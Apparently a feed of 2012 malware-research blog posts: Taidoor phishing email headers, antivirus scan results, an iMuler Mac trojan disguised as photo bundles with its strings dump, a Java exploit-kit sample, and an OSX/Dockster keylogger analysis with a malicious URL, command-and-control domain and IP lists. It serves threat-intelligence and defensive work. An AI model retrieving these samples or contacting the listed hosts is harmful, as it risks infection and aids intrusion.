X-Yahoo-Newman-Property: ymail-5

X-YMail-OSG: M_hRw4wVM1lKJVKy3cN._hIFgwq7ygzEDXdVecwWndt0GCK

UYyfTw_pZb5Zl.vKdwNgbVhgbvIYW6Apbi_6qrta83ynjAQU9gosALflRvlj

1P8cG27uA3C2TQSGhNbASyznBE8G0iD9IzO6Bwp16HtZbJU9pbRWkBz79ULj

1A6OCOnKOfqJZPy9sMPeDz8HRIY1iFT1wyTMvrnczltjCk2LPCriCnNIHQx.

wiQkHjRgleWGaSE7ttC2ZV9RIjPQgh0.g9uo0UZ.LlmAUh7kRVP9oOvHmPqJ

P5q_Gzc8aPC2akubsC8IPycCSta_7nCtl82o5t59LOqP5n0paxFa_0.w2tRF

leWS4Pxjzw6JzmyVyYOTcdR9kVLCcXwYd7VxVUtmczoLB8XfFiACzeAQ0WBn

KpUY5KWwDe4FklBAB1uQ3F9i3OPdaNw0K

X-Yahoo-SMTP: QFan6h2swBBkcpPdQXIiwXg08TmA4BU-

Received: from SFGDSGSGFDSG (xxxxxxxxx@111.254.231.18 with login)

by smtp211.mail.sg3.yahoo.com with SMTP; 10 Sep 2012 19:45:40 -0700 PDT

Message-ID: <14FD634A91254F6D81F309B6AE0D96D2@SFGDSGSGFDSG>

From: xxxxxxxxx@yahoo.com.tw>

To: xxxxxxxx@mac.gov.tw>

Subject: =?big5?B?uOquxqjRsNGm0g==?=

Date: Tue, 11 Sep 2012 10:45:37 +0800

MIME-Version: 1.0

Content-Type: multipart/signed;

protocol="application/x-pkcs7-signature";

micalg=SHA1;

boundary="----=_NextPart_000_00F2_01CD900A.93FD5BE0"

X-Priority: 3

X-MSMail-Priority: Normal

X-Mailer: Microsoft Outlook Express 6.00.2900.5931

X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.6109

X-DNSRBL:

X-MAIL: xxx.trade.gov.tw q8B2kJNZ080932

Return-Path: xxxxxxxxxxyahoo.com.tw

X-OriginalArrivalTime: 11 Sep 2012 02:46:25.0984 (UTC) FILETIME=[A3043C00:01CD8FC7]

Automatic scans

Virustotal for 5387ad3225657f8857ddeaf70346722b1ef232beff3d74a9bf8d31738fc9c59a

SHA256:5387ad3225657f8857ddeaf70346722b1ef232beff3d74a9bf8d31738fc9c59a

SHA1:e4a5517ed0626677a31f123446403dd1e79afca4

MD5:40d79d1120638688ac7d9497cc819462

File size:32.0 KB ( 32768 bytes )

File name:WPFFontCache_v0400.exe

File type:Win32 EXE

Tags:peexe armadillo

Detection ratio:20 / 44

Analysis date: 2012-10-14 21:16:36 UTC ( 1 day, 4 hours ago )

AntivirusResultUpdate

AVGGeneric29.AHPF20121014

BitDefenderGen:Trojan.Heur.RP.cq0@ayoZefab20121014

EmsisoftBackdoor.Win32.Simbot!IK20120919

ESET-NOD32a variant of Win32/Injector.UQP20121014

F-SecureGen:Trojan.Heur.RP.cq0@ayoZefab20121003

GDataGen:Trojan.Heur.RP.cq0@ayoZefab20121014

IkarusBackdoor.Win32.Simbot20121014

KasperskyTrojan.Win32.Inject.elqk20121014

KingsoftWin32.Troj.Inject.(kcloud)20121008

McAfee-GW-Edition-20121014

MicrosoftBackdoor:Win32/Simbot.gen20121014

MicroWorld-eScanGen:Trojan.Heur.RP.cq0@ayoZefab20121014

NormanW32/Obfuscated_JA20121014

nProtectTrojan/W32.Inject.32768.CG20121014

PandaSuspicious file20121014

PCToolsTrojan.Taidoor20121014

SophosMal/Simbot-B20121014

SymantecTrojan.Taidoor!gen120121014

TrendMicroBKDR_SIMBOT.SMAZ20121014

TrendMicro-HouseCallBKDR_SIMBOT.SMAZ20121014

ViRobotBackdoor.Win32.Simbot.3276820121014

https://www.virustotal.com/file/950aef9e49da2f64cbf48f3c3e31545f463686989ed75c332168fdfc841bf26d/analysis/1350361985/

SHA256:950aef9e49da2f64cbf48f3c3e31545f463686989ed75c332168fdfc841bf26d
SHA1:e519986529723c74d93efe8441ea42985529805b
MD5:6d6b797c99a11b066746948eb1ef4aa8
File size:36.1 KB ( 36976 bytes )
File name:desktop.ini
File type:Win32 EXE
Detection ratio:9 / 43
Analysis date: 2012-10-16 04:33:05 UTC ( 0 minutes ago )
Additional information
AntivirusResultUpdate
AgnitumSuspicious!SA20121014
AVGSuspicion: unknown virus20121016
ComodoUnclassifiedMalware20121016
ESET-NOD32a variant of Win32/Injector.XDH20121015
IkarusVirus.Win32.Patched20121016
KingsoftWin32.Troj.Sasfis.(kcloud)20121008
NormanW32/Obfuscated_JA20121015
SymantecWS.Reputation.120121016
TrendMicro-HouseCallTROJ_GEN.F47V091120121016

↧

Group Photos.zip OSX/Revir | OSX/iMuler samples March 2012-November 2012

November 13, 2012, 10:36 pm

≫ Next: CVE-2012-5076 Java sample from "Cool" exploit pack

≪ Previous: CVE-2012-1535 Sep.9, 2012 "房號表.doc - Data for Reference.doc" and Taidoor trojan sample set for signature development

Sophos posted information about a variant of iMuler OSX trojan targeting Tibet activists (New variant of Mac Trojan discovered, targeting Tibet ) and posted the MD5 2d84bfbae1f1b7ab0fc1ca9dd372d35e (FileAgent 37.3 KB) of the trojan . This post is for the actual dropper, which is a full 1.9 MB package (Group photo.zip MD5: 9e34256ded3a2ead43f7a51b9f197937)

I don't have a Mac OS VM handy tonight to provide more details about the traffic or behavior so I will just describe the package and post the previous version of the same trojan that was targeting fans of Russian topless models.

Download

Download files listed below (email me if you need the password)

October 2012
File: Group photo.zip Size: 1976395
MD5: 9E34256DED3A2EAD43F7A51B9F197937

OSX/iMuler 2012-03
img. by ESET

March 2012
Read: ESET OSX/Imuler updated: still a threat on Mac OS X

7dba3a178662e7ff904d12f260f0fff3 (Installer)
9d2462920fdaed5e360875fb0cf8274f (malicious payload))
D029E0D44F07F9F4566B0FCE93D8A17E (payload variant)
e00a280ad29440dcaab42ad093bcaafd (uploader module)

File Information

Just like the previous version of iMuler, this trojan hides inside a zip package with application bundle files .app disguised as photos. Default installation of Mac OS will show those app files like any images files - see above. Clicking on them to expand would install the trojan.

The screenshot made from Windows and list of files shows clearly that these are not just images.

├───DSC08381.app

│ └───Contents

│ │ Info.plist

│ │ PkgInfo

│ │

│ ├───MacOS

│ │ .cnf

│ │ .confr <<<< Image file

│ │ .conft

│ │ FileAgent <<<< MD5: 2D84BFBAE1F1B7AB0FC1CA9DD372D35E (Virustotal 6/44)

│ │

│ └───Resources

│ │ co.icns

│ │

│ └───English.lproj

│ InfoPlist.strings

│ MainMenu.nib

│

├───DSC08387.app

│ └───Contents

│ │ Info.plist

│ │ PkgInfo

│ │

│ ├───MacOS

│ │ .cnf

│ │ .confr <<<< Image file

│ │ .conft

│ │ FileAgent <<<< MD5: 2D84BFBAE1F1B7AB0FC1CA9DD372D35E (Virustotal 6/44)

│ │

│ └───Resources

│ │ co.icns

│ │

│ └───English.lproj

│ InfoPlist.strings

│ MainMenu.nib

│

└───DSC08511.app

└───Contents

│ Info.plist

│ PkgInfo

│

├───MacOS

│ .cnf

│ .confr <<<< Image file

│ .conft

│ FileAgent <<<< MD5: 2D84BFBAE1F1B7AB0FC1CA9DD372D35E (Virustotal 6/44)

│

└───Resources

│ co.icns

│

└───English.lproj

InfoPlist.strings

MainMenu.nib

File: FileAgent
MD5: 2d84bfbae1f1b7ab0fc1ca9dd372d35e
Size: 38212

Ascii Strings:
---------------------------------------------------------------------------
__PAGEZERO
__TEXT
__text
__TEXT
__cstring
__TEXT
__DATA
__data
__DATA
__dyld
__DATA
__OBJC
__image_info
__OBJC
__IMPORT
__jump_table
__IMPORT
__LINKEDIT
/usr/lib/dyld
/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
/usr/lib/libcrypto.0.9.7.dylib
/usr/lib/libgcc_s.1.dylib
/usr/lib/libSystem.B.dylib
FILE
AGEN
TVer
.conf
.conf
.cnf
TMPA
AABBf
/tmp
/Spo
tligf
/tmpf
TMPA
AABBf
rm -
rf "
/tmp
/tmp/Spotlight
/tmp/Spotlight&
/tmp/launch-ICS000
#!/bin/sh
open "
dyld_stub_binding_helper
__dyld_func_lookup
_init_daemon
_encryptFile
_copyfile
_main
_NXArgc
_NXArgv
___progname
__mh_execute_header
_environ
start
_RC4
_RC4_set_key
_access
_chdir
_chmod$UNIX2003
_close$UNIX2003
_exit
_fclose
_fopen
_fork
_fread
_free
_fwrite$UNIX2003
_malloc
_memset
_setsid
_strcat
_strcpy
_strlen
_system$UNIX2003
_umask
/Users/imac/Desktop/macback/FileAgent/main.m
/Users/imac/Desktop/macback/FileAgent/build/FileAgent.build/Release/FileAgent.build/Objects-normal/i386/main.o
_init_daemon
_encryptFile
_copyfile
_main
8__PAGEZERO
__TEXT
__text
__TEXT
__symbol_stub1
__TEXT
__cstring
__TEXT
__DATA
__data
__DATA
__dyld
__DATA
__la_symbol_ptr
__DATA
|__OBJC
__image_info
__OBJC
8__LINKEDIT
/usr/lib/dyld
/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
/usr/lib/libcrypto.0.9.7.dylib
/usr/lib/libgcc_s.1.dylib
/usr/lib/libSystem.B.dylib
+x8B
P8`(
x8`(
#x|~
/tmp
FILEAGENTVer1.0
.confr
.conft
.cnf
TMPAAABBB
/tmp/Spotlight
/tmp/Spotlight&
/tmp/
/tmp/launch-ICS000
#!/bin/sh
open "
rm -rf "
dyld_stub_binding_helper
__dyld_func_lookup
_init_daemon
_encryptFile
_copyfile
_main
_NXArgc
_NXArgv
___progname
__mh_execute_header
_environ
start
_RC4
_RC4_set_key
_access
_chdir
_chmod$UNIX2003
_close$UNIX2003
_exit
_fclose
_fopen
_fork
_fread
_free
_fwrite$UNIX2003
_malloc
_memset
_setsid
_strcat
_strcpy
_strlen
_system$UNIX2003
_umask
/Users/imac/Desktop/macback/FileAgent/main.m
/Users/imac/Desktop/macback/FileAgent/build/FileAgent.build/Release/FileAgent.build/Objects-normal/ppc/main.o
_init_daemon
_encryptFile
_copyfile
_main

Unicode Strings:
---------------------------------------------------------------------------

Automatic scans

Dropper
https://www.virustotal.com/file/da7a5e69f1d5e4f77321b90b6153b84daed74d784e5ce016053fec7fcf5aea0a/analysis/1352874459/

SHA256:da7a5e69f1d5e4f77321b90b6153b84daed74d784e5ce016053fec7fcf5aea0a
SHA1:b70505e0e8607b94f1f8437f8298d907168d37d5
MD5:9e34256ded3a2ead43f7a51b9f197937
File size:1.9 MB ( 1976395 bytes )
File name:vti-rescan
File type:ZIP
Detection ratio:6 / 44
Analysis date: 2012-11-14 06:27:39 UTC ( 0 minutes ago )
DrWebTrojan.Muxler.720121114
ESET-NOD32OSX/Imuler.E20121113
F-SecureTrojan-Dropper:OSX/Revir.D20121114
SophosOSX/Imuler-B20121114
TrendMicroOSX_IMULER.D20121114
TrendMicro-HouseCallOSX_IMULER.D20121114

https://www.virustotal.com/file/574bf26b5da7b8c400d85e48fad3c9ab3ff6fa432f80b46d3bd509940b04f373/analysis/
SHA256:574bf26b5da7b8c400d85e48fad3c9ab3ff6fa432f80b46d3bd509940b04f373
SHA1:782312db766a42337af30093a2fd358eeed97f53
MD5:2d84bfbae1f1b7ab0fc1ca9dd372d35e
File size:37.3 KB ( 38212 bytes )
File name:vti-rescan
File type:unknown
Detection ratio:6 / 44
Analysis date: 2012-11-13 20:41:37 UTC ( 9 hours, 8 minutes ago )
DrWebTrojan.Muxler.720121113
ESET-NOD32OSX/Imuler.E20121113
F-SecureTrojan-Dropper:OSX/Revir.D20121113
SophosOSX/Imuler-B20121113
TrendMicroOSX_IMULER.D20121113
TrendMicro-HouseCallOSX_IMULER.D20121113

↧

CVE-2012-5076 Java sample from "Cool" exploit pack

November 13, 2012, 11:16 pm

≫ Next: Common Exploit Kits 2012 Poster (based on Exploit pack table Update 18, Nov 12, 2012)

≪ Previous: Group Photos.zip OSX/Revir | OSX/iMuler samples March 2012-November 2012

Here is quick post for a CVE-2012-5076 sample (from Cool pack, as described by Kafeine here Cool EK : "Hello my friend..." CVE-2012-5076 )

CVE #

CVE-2012-5076 Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to JAX-WS.

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Download

Download 327a1cbf1e1e06df765f959ad5b05089 new.jar (contact me if you need the password)
(password fixed, redownload if you tried it before Nov 14 3:30pm EST)

Automatic scan

https://www.virustotal.com/file/0d813ce9782e3df9ee56999531add7fee23ac1d30c9d1920665e78d098e7178f/analysis/

SHA256:0d813ce9782e3df9ee56999531add7fee23ac1d30c9d1920665e78d098e7178f
SHA1:76bac76730283b298fe67c5e301cf3f32d968e0a
MD5:327a1cbf1e1e06df765f959ad5b05089
File size:9.8 KB ( 10049 bytes )
File name:medianewjar
File type:JAR
Tags:cve-2012-5067 cve-2012-5074 exploit jar cve-2012-5076
Detection ratio:11 / 42
Analysis date: 2012-11-13 17:52:33 UTC ( 13 hours, 5 minutes ago )
AntiVirEXP/Java.JAX-WS.A20121113
Antiy-AVL-20121113
AvastJava:CVE-2012-5076-A [Expl]20121113
F-SecureExploit:Java/CVE-2012-5076.A20121113
GDataJava:CVE-2012-5076-A20121113
KasperskyUDS:DangerousObject.Multi.Generic20121113
NormanCVE_2012_5076.A20121112
PCToolsTrojan.Maljava20121113
SophosTroj/Java-LJ20121113
SymantecTrojan.Maljava20121113
TrendMicro-HouseCallTROJ_GEN.RCBH1KC20121113
ViRobotJAVA.S.CVE-2012-5076.1004920121113

↧

Common Exploit Kits 2012 Poster (based on Exploit pack table Update 18, Nov 12, 2012)

November 14, 2012, 7:30 pm

≫ Next: OSX/Dockster.A and Win32/Trojan.Agent.AXMO Samples, pcaps, OSX malware analysis tools

≪ Previous: CVE-2012-5076 Java sample from "Cool" exploit pack

Update November 14, 2012
1. We forgot to mention that in the best tradition of the Antivirus industry, all posters come with one (1) year of free updates. Email us when a new version of the poster comes out ( use same email address or reply to the original message) and we will send you the file (same size you ordered, in JPG format). We cannot reprint Zazzle posters but you can use your own printing, or upload and order your own from Zazzle.

2. We added two more sizes for smaller wall spaces and budgets (asking for $15 and $10 to be donated to charity )

Hurricane Sandy, Jersey Shore
Src. Twitter Oct 28,2012
author unknown

This update to the exploit pack table comes in the form of a poster (Exploit pack table update 18 is coming soon too).
The poster includes most common exploit packs of 2012. The poster will be updated and new issues posted in the future.

Poster sizes:

~~If you wish to order a larger poster print, (up to 60"x40" or 152cm x 101cm), follow this link to Zazzle.com~~
Zazzle cancelled orders due to logos in fish images, despite the fact that their use falls under "Nominative Fair use" policy (Read: "Lawful use of another's trademark") and we make zero money on it. Here is an example of PC magazine using it lawfully to compare browsers - they also publish and sell their magazine is stores.
We filed a complaint with Zazzle. But even if they don't cancel, Zazzle is also very overpriced so you are likely to find cheaper ways to print it. so we do not recommend using it anymore.

If Zazzle cancelled your order, email us and we will send you the full file for free.

Staten Island Hurricane Sandy Relief (Staten Island Project Hospitality).

See Staten Island hurricane aftermath photos here:

Time.com NY Times

If you wish to use your own printing services and/or need multiple copies, you can request the poster file (see sizes below) in exchange for donation to the Hurricane Relief or a charity of your choice. Email us (admin at deependresearch.org) a receipt of a donation made in the past month (you can partially hide/obscure your personal info, if needed) and we will send you the file.
8900 x 6000 px = up to 40" x 60" (101 x 150 cm) = $25 Donate here or charity of your choice
5340 x 3600 px = up to 24" x 35.6" (~ 61 x 91 cm) = $15 Donate here or charity of your choice
3578 x 2415 px = up to 16" x 24" (~ 40 x 60 cm) = $10 Donate here or charity of your choice
1720 x 1200 px = up to 11"x14" (~ 20 x 30 cm) = Free Download

All logos in the images of the fish are trademarks of Adobe Systems, Sun Microsystems, Apple, and Microsoft. The logos are used only for product comparison and academic research reasons that fall within "Fair use" and "Nominative Fair use" limits. If these companies have any concerns, their representatives can contact us via email.

See more here:

http://en.wikipedia.org/wiki/Nominative_use

http://en.wikipedia.org/wiki/Fair_use

↧

OSX/Dockster.A and Win32/Trojan.Agent.AXMO Samples, pcaps, OSX malware analysis tools

December 4, 2012, 11:11 pm

≫ Next: Oct 2012 - Skype Dorkbot / W32.Phopifas samples

≪ Previous: Common Exploit Kits 2012 Poster (based on Exploit pack table Update 18, Nov 12, 2012)

Img.baronet4tibet. Tibetan furniture
featuring a leopard and a lion

Better late than never. Here are the samples of the recent twin newsmakers OSX/Dockster.A and Win32/Trojan.Agent.AXMO. The malware was already described and hashes published but I thought I would add traffic captures and samples themselves.

I ran these samples on Thursday, November 29 (OSX) and Friday, November 30 (Agent.AXMO) when the C&C servers were still online. Intego mentioned the address itsec.eicp.net was not registered and it was possibly a test but it is a dynamic DNS address and it was down by the weekend.Credit for the sample goes to an anonymous Santa.

I have to admit that my knowledge of OSX malware leaves much to be desired. When we deal with Windows malware, range of choices for capturing, logging, recording, and analyzing is similar to this. I cannot name more than a few for MAC OSX - Wireshark, native Apple syslogs, IDA, Macmemoryze from Mandiant, and a few more below. If you have some good recent papers and tools lists for OSX malware analysis please share.

Read more here
http://www.f-secure.com/weblog/archives/00002466.html

Papers and tools for OSX malware analysis

Some OSX malware analysis tools and links

Activity Monitor (Max OSX Utilities folder)
MacMemoryze (support for Mountain Lion) free,
Volatility (partial support for Mountain lion) free
fseventer (graphical event representation) - works on Mountain lion
Wireshark
IDA pro
http://osxbook.com/ OSX internals
2009 Mac OS X Malware Analysis Author: Joel Yonts
Apple OS X ABI Mach-O File Format Reference
FileXray $79 but looks like it is worth it if you do OSX forensics

Download

Download all files (email me if you need the password)

download Dockster pcap

download Trojan.Agent.AXMO pcap

Files

hxxp://www .gyalwarinpoche .com /destmac.jar

File: file.tmp

Size: 241621

MD5: C6CA5071907A9B6E34E1C99413DCD142

https://www.virustotal.com/file/8da09fec9262d8bbeb07c4e403d1da88c04393c8fc5db408e1a3a3d86dddc552/analysis/

File: destmac.jar

Size: 109200

MD5: 5415777DB44C8D808EE3A9AF94D2A4A7

https://www.virustotal.com/file/d4f69285fcb8d669b9ff950f4d52c66628d797f7d58ede416945bcf4d6a1d265/analysis/

==============================================

File: c3432c1bbdf17ebaf1e10392cf630847_file.tmp

Size: 61435

MD5: C3432C1BBDF17EBAF1E10392CF630847

http://www.virustotal.com/file/4d89364a1ee4c3d14102631d9807764dc538df4e85c91912252baca0c45ea484/analysis/

File: install.jar

Size: 39181

MD5: 44A67E980F49E9E2BED97ECE130F8592

https://www.virustotal.com/file/f1556cc907262986bb6991a7785078f838ab5215409f8fbd14b99717956b09c9/analysis/

OSX/Dockster.A

File: file.tmp

Size: 241621

MD5: C6CA5071907A9B6E34E1C99413DCD142

File: destmac.jar
Size: 109200
MD5: 5415777DB44C8D808EE3A9AF94D2A4A7

Jar files contents

Unhide hidden files

defaults write com.apple.Finder AppleShowAllFiles 1

Hidden .Dockset file

Mac OS Activity Monitor (Utilities)

Mac OSX Activity Monitor
-------------------------------------------------------------------------------------------------------------

Mac OS Activity Monitor (Utilities) -click on process

Mac OS Activity Monitor (Utilities) - process sampling

MacMemoryze

MacMemoryze (support for Mountain Lion) free

Macmemoryze is very easy to use - read more here

Launch the app and click Dump It. Takes a minute or so to dump the file

Memoryze Walk process list.

proclist -f dump.mem 2>err.txt

.Dockster process seen

proclist -s -p 1545 -f dump.mem

Analyze memory sections, see where file is located

see more commands

usage: macmemoryze [dump|proclist|kextlist|syscalllist] options

-h help screen
-f filename previously dumpped memory (otherwise uses physical memory and driver)
-xxml output
dump
-qquiet (dont display % complete)
-fname of file to dump to

proclist

-wparse process file handles with process
-sparse process section info with process
-tdump process sections [requires -s option]
-ccarve processes (dont walk list)
-rwalk mach task list

-p pidpid to process

-n namename of process to process
kextlist
-ccarve kexts from memory
syscalllist
-ssyscall table
-mmach_trap table

FSEventer.app
fseventer (graphical event representation)

FSEventer Before the infection

FSeventer after the infection

hexdump -C <file> (mac.Dockset.deman.plist)

Add caption

strings <file> (mac.Dockset.deman.plist)

IDA Pro

In addition to keylogging, the trojan functions reveal other actions the trojan can perform such as search for files, upload them, encrypt traffic , receive commands, get information on the infected computer.

Keylogger function

File: file.tmp

Size: 241621

MD5: C6CA5071907A9B6E34E1C99413DCD142

__Z18RunKeyLoggerThreadPv

__Z9RunThreadPFPvS_ES_

__Z11consultCS_Qic

__Z11cousultCS_Ric

__Z15WorkThreadEnterPv

__Z16initworksocket_Si8sockaddri

__Z17createworkendportPcs

__Z16createworksocketv

__Z22CreateSocketAndConnect8sockaddri

__Z5mainDiPKPc

__Z10configinitv

__Z10SearchFileiPcS_

___tcf_0

_main

__Z5_recviPciili

__Z4SendiPcii

__Z4RecviPcii

__Z8SendFileiimm

__Z8RecvFileiimm

__Z8SendVoidiPcic

__Z8RecvVoidiPPcPiS_

__Z9SendOrderic

__Z10SendHeaderibbbbh

__Z6SetOSKi

__Z8SendDataiPcii

__Z11SendFile_ExiimmP11aes_context

__Z11SendDataEndi

__Z12RecvDataHeadi

__Z11RecvFile_ExiimmP11aes_context

__Z8RecvDataiPcii

__Z10SendDataExiPcii

__Z10RecvDataExiPcii

__Z11COutDataBufi

__Z10CInDataBufPv

__Z8COutDataPviS_iS_

__Z7CInDataPviS_iS_

__Z13AccountVerifyP8WorkDataP11WorkSession9LoginData

__Z10VerifyLoopP8WorkDataP11WorkSession

___tcf_0

__Z6ip2macv

__Z10gethostkeyPhi

__Z8gethdataPhPiS_iii

__Z12gethdatasizePhPii

__Z8sethdataPhPiS_iii

__Z13API_fileexistPc

__Z12API_filecopyii

__Z17API_filecopy_modePcS_

__Z12API_copyfilePcS_

__Z10API_mkdirsPcit

__Z11API_finddirP7regex_tP3DIRi

__Z10API_dircatPcS_S_

__Z15API_findnextdirP3DIR

__Z10API_mkpathPKcPc

__Z3mixPci

__Z13MainLoopEnterP8WorkDataP11WorkSession

___tcf_0

__Z9ik_malloci

__Z10uploadfileP8WorkDataP11WorkSession

__Z14CMD_uploadfileP8WorkDataP11WorkSession

__Z12downloadfileP8WorkDataP11WorkSessionPc

__Z9countfilePcc

__Z7listdirP8WorkDataP11WorkSessionPc

__Z8rmdirallPc

__Z6mkdirsPcit

__Z8filecopyii

__Z13filecopy_modePcS_

__Z8copyfilePcS_

__Z7copydirPcS_b

__Z8copytreePcS_

__Z18CMD_getprocesslistP8WorkDataP11WorkSession

__Z15CMD_killprocessP8WorkDataP11WorkSession

__Z14CMD_getserviceP8WorkDataP11WorkSession

__Z13CMD_keyloggerP8WorkDataP11WorkSession

__Z16CMD_downloadfileP8WorkDataP11WorkSession

__Z25API_getfilepathfromsocketP8WorkDataP11WorkSessionPhiiii

__Z12CMD_filecopyP8WorkDataP11WorkSession

__Z12CMD_filemoveP8WorkDataP11WorkSession

__Z14CMD_fileattribP8WorkDataP11WorkSession

__Z14CMD_filedeleteP8WorkDataP11WorkSession

__Z13CMD_dircreateP8WorkDataP11WorkSession

__Z13CMD_dirdeleteP8WorkDataP11WorkSession

__Z11CMD_dircopyP8WorkDataP11WorkSession

__Z11CMD_dirmoveP8WorkDataP11WorkSession

__Z8CMD_listP8WorkDataP11WorkSession

__Z18threaddownloadfilePv

__Z17_CMD_downloadfileP8WorkDataP11WorkSession

___tcf_0

__Z15FileSystemEnterP8WorkDataP11WorkSession

_shift_sub_rows

_inv_shift_sub_rows

_aes_set_key

_update_encrypt_key_128

_update_decrypt_key_128

_update_encrypt_key_256

_mix_sub_columns

_inv_mix_sub_columns

_aes_decrypt_256

_aes_encrypt_256

_aes_decrypt_128

_aes_encrypt_128

_aes_decrypt

Wireshark (download pcap)

Encrypted traffic to 123.120.110.212 itsec.eicp.net

itsec.eicp.net has been around on various ips for a year or so

list of all IPs

1.203.100.232
1.203.102.251
1.203.102.63
1.203.103.227
1.203.104.45
1.203.106.150
1.203.107.125
1.203.107.200
1.203.108.46
1.203.109.193
1.203.112.147
1.203.112.178
1.203.113.2
1.203.114.165
1.203.118.19
1.203.123.29
1.203.123.68
1.203.123.83
1.203.125.201
1.203.125.248
1.203.132.236
1.203.132.54
1.203.135.238
1.203.137.25
1.203.139.148
1.203.139.94
1.203.142.100
1.203.142.111
1.203.98.98
1.203.99.111
1.203.99.36
111.194.101.196
111.194.104.129
111.194.104.220
111.194.105.63
111.194.106.206
111.194.106.225
111.194.107.0
111.194.108.247
111.194.109.202
111.194.109.36
111.194.111.0
111.194.111.16
111.194.116.110
111.194.116.160
111.194.119.106
111.194.120.159
111.194.123.34
111.194.92.111
111.194.92.203
111.194.93.187
111.194.93.62
111.194.93.67
111.194.94.141
111.194.94.188
111.194.94.99
111.194.96.100
111.194.96.194
111.194.96.44
111.194.97.128
111.194.97.55
111.194.98.34
111.194.99.29
114.248.100.174
114.248.100.22
114.248.102.191
114.248.103.1
114.248.103.54
114.248.104.3
114.248.105.118
114.248.107.233
114.248.107.97
114.248.108.73
114.248.109.170
114.248.80.175
114.248.80.241
114.248.80.81
114.248.80.84
114.248.81.127
114.248.81.151
114.248.81.155
114.248.81.157
114.248.81.230
114.248.81.247
114.248.81.253
114.248.81.30
114.248.81.42
114.248.82.128
114.248.82.195
114.248.82.66
114.248.83.161
114.248.83.28
114.248.83.98
114.248.84.134
114.248.84.170
114.248.84.171
114.248.84.180
114.248.84.201
114.248.84.64
114.248.84.79
114.248.85.150
114.248.85.154
114.248.85.159
114.248.85.188
114.248.85.189
114.248.85.197
114.248.85.204
114.248.85.21
114.248.85.236
114.248.86.108
114.248.86.206
114.248.86.232
114.248.86.240
114.248.86.59
114.248.86.76
114.248.87.142
114.248.87.150
114.248.87.227
114.248.87.28
114.248.88.125
114.248.88.142
114.248.88.144
114.248.88.166
114.248.88.173
114.248.88.225
114.248.88.230
114.248.88.232
114.248.88.241
114.248.88.35
114.248.88.39
114.248.88.44
114.248.88.46
114.248.88.98
114.248.89.12
114.248.89.144
114.248.89.189
114.248.89.221
114.248.89.6
114.248.89.63
114.248.90.143
114.248.90.185
114.248.90.189
114.248.90.216
114.248.90.28
114.248.90.60
114.248.91.103
114.248.91.145
114.248.91.168
114.248.91.180
114.248.91.194
114.248.91.244
114.248.91.27
114.248.91.28
114.248.91.51
114.248.92.10
114.248.92.106
114.248.92.128
114.248.92.188
114.248.92.197
114.248.92.225
114.248.92.51
114.248.93.106
114.248.93.112
114.248.93.138
114.248.93.150
114.248.93.169
114.248.93.192
114.248.93.199
114.248.93.223
114.248.93.225
114.248.93.29
114.248.94.157
114.248.94.207
114.248.94.208
114.248.94.220
114.248.95.122
114.248.95.252
114.248.95.49
114.248.95.59
114.248.95.76
114.248.98.177
114.249.17.36
114.249.192.233
114.249.192.240
114.249.193.21
114.249.193.224
114.249.198.34
114.249.200.189
114.249.201.179
114.249.202.183
114.249.202.186
114.249.203.14
114.249.204.158
114.249.204.231
114.249.204.84
114.249.205.239
114.249.207.180
114.249.21.11
114.249.23.24
114.249.26.166
114.249.30.18
114.249.30.231
115.170.0.45
115.170.0.72
115.170.1.206
115.170.10.130
115.170.10.225
115.170.100.226
115.170.102.194
115.170.102.206
115.170.102.87
115.170.103.103
115.170.103.21
115.170.103.64
115.170.104.14
115.170.105.173
115.170.105.238
115.170.105.79
115.170.106.113
115.170.106.227
115.170.107.103
115.170.107.36
115.170.108.94
115.170.109.87
115.170.11.251
115.170.110.15
115.170.110.230
115.170.112.223
115.170.113.118
115.170.114.108
115.170.114.17
115.170.114.6
115.170.115.199
115.170.117.59
115.170.118.48
115.170.120.127
115.170.122.87
115.170.124.23
115.170.125.97
115.170.126.173
115.170.128.140
115.170.128.43
115.170.128.72
115.170.129.116
115.170.129.176
115.170.129.181
115.170.129.183
115.170.130.74
115.170.131.191
115.170.131.4
115.170.132.122
115.170.132.123
115.170.133.151
115.170.133.165
115.170.133.245
115.170.134.107
115.170.134.136
115.170.134.225
115.170.135.90
115.170.136.213
115.170.137.130
115.170.138.132
115.170.138.16
115.170.139.90
115.170.14.14
115.170.140.232
115.170.142.183
115.170.146.231
115.170.146.253
115.170.153.134
115.170.153.135
115.170.157.205
115.170.162.122
115.170.163.131
115.170.163.155
115.170.166.132
115.170.166.133
115.170.166.32
115.170.168.33
115.170.170.122
115.170.171.171
115.170.172.161
115.170.173.42
115.170.173.75
115.170.173.8
115.170.174.246
115.170.174.85
115.170.175.206
115.170.176.233
115.170.177.113
115.170.177.198
115.170.183.100
115.170.185.163
115.170.187.43
115.170.188.46
115.170.188.77
115.170.189.57
115.170.19.79
115.170.191.71
115.170.191.95
115.170.194.179
115.170.194.66
115.170.195.248
115.170.197.19
115.170.197.38
115.170.197.82
115.170.199.39
115.170.20.200
115.170.200.88
115.170.202.130
115.170.203.242
115.170.204.136
115.170.205.46
115.170.206.142
115.170.209.192
115.170.209.203
115.170.21.112
115.170.210.246
115.170.211.134
115.170.211.51
115.170.212.115
115.170.212.157
115.170.212.68
115.170.212.70
115.170.212.86
115.170.215.138
115.170.217.225
115.170.219.235
115.170.219.89
115.170.221.125
115.170.23.254
115.170.231.191
115.170.236.178
115.170.237.235
115.170.238.56
115.170.24.217
115.170.24.219
115.170.24.220
115.170.3.87
115.170.30.49
115.170.31.215
115.170.32.127
115.170.32.58
115.170.32.65
115.170.33.1
115.170.34.247
115.170.35.169
115.170.35.185
115.170.39.112
115.170.39.228
115.170.4.125
115.170.4.175
115.170.40.230
115.170.41.43
115.170.43.78
115.170.45.173
115.170.46.2
115.170.47.39
115.170.48.38
115.170.49.223
115.170.5.17
115.170.52.198
115.170.57.211
115.170.6.11
115.170.6.203
115.170.6.252
115.170.60.1
115.170.61.137
115.170.61.218
115.170.62.54
115.170.63.149
115.170.63.221
115.170.66.117
115.170.67.116
115.170.67.98
115.170.68.177
115.170.69.142
115.170.69.155
115.170.70.102
115.170.96.119
115.170.96.32
115.170.97.137
115.170.97.141
115.170.97.235
115.170.97.50
115.170.99.132
115.170.99.217
115.170.99.40
115.171.10.216
115.171.100.183
115.171.112.80
